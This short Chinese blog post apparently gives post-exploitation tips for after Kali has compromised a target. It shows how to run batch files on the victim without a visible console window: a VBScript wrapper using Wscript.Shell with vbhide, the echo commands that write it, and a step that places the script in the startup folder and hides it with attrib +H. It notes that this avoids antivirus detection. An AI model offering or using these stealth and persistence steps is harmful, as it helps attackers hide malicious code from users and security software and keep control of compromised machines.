当kali成功溢出目标以后, 如果我们需要目标主机执行批处理bat的话, 目标机器会出现黑色的弹窗, 用户看到一个黑色弹窗肯定会奇怪, 以下有两种方法让bat文件运行起来:
1:使用bat转化为exe的工具 : bat转exe工具(Bat To Exe Converter), 这种方式虽然简单, 但是杀毒软件会报毒
2:把bat文件通过vbs调用, 在vbs执行的过程中调用bat文件, vbs调用bat文件地时候,可以把默认地黑色窗口隐藏, 此时系统杀毒软件不会报毒
vbs内部的内容如下, run.bat为需要执行的bat文件:
Set ws = CreateObject("Wscript.Shell") ws.run "cmd /c c:\run.bat",vbhide
在cmd中执行, 手动生成vbs文件:
echo Set ws = CreateObject("Wscript.Shell") > b.vbs echo ws.run "cmd /c c:\run.bat",vbhide >> b.vbs
然后命令行下继续执行b.vbs即可, 实现隐藏执行bat文件
把这个vbs复制到c盘的启动目录下, 然后通过CMD添加隐藏属性, 即可神不知鬼不觉地启动了
attrib +H b.vbs
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
QQ:287101329
微信:18101055830
时间: 2024-10-07 06:00:15